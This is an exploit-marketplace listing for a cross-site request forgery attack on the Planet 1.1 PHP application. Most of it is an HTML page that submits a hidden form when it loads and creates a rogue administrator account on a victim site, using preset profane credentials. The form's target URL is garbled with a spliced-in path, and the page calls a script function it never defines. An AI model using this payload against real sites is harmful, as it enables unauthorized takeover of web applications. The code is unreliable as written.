[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Planet 1.1 - [CSRF] Add Admin Account

Author
G0D-F4Th3r
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-12739
Category
web applications
Date add
17-06-2010
Platform
php
=====================================
Planet 1.1 - [CSRF] Add Admin Account
=====================================


# Exploit Title: Planet 1.1 - [CSRF] Add Admin Account
# Date: 17-06-2010
# Author: G0D-F4Th3r
# Software Link: http://php.femtolayer.com/planet1_1/
# Version: 1.1
# Tested on: http://php.femtolayer.com/planet1_1/
 
##################################################################################
<html>
<body onload="javascript:fireForms()">
 
<form method="POST" name="form0"
action="http://www.site.com/[path]<http://www.site.com/%5Bpath%5D/admincp/staff.php?do=edit&id=1&go=update>
/cp/security.php?do=admins">
<input type="hidden" name="username" value="fuck"/>
<input type="hidden" name="password" value="fuckpass123"/>
<input type="hidden" name="pp" value=""/>
<input type="hidden" name="email" value="fuck@mail.com"/>
<input type="hidden" name="mobile" value="966555555555"/>
<input type="hidden" name="site" value="http://www.femtolayer.com"/>
<input type="hidden" name="location" value="US"/>
<input type="hidden" name="access" value="1"/>
</form>
</body>
</html>
###########################################################################
##############
Greetz to : AL-MoGrM - dEvIL NeT - Bad hacker - v4-team members - And All My
Friends
##################################################################################
#######



#  0day.today [2024-11-15]  #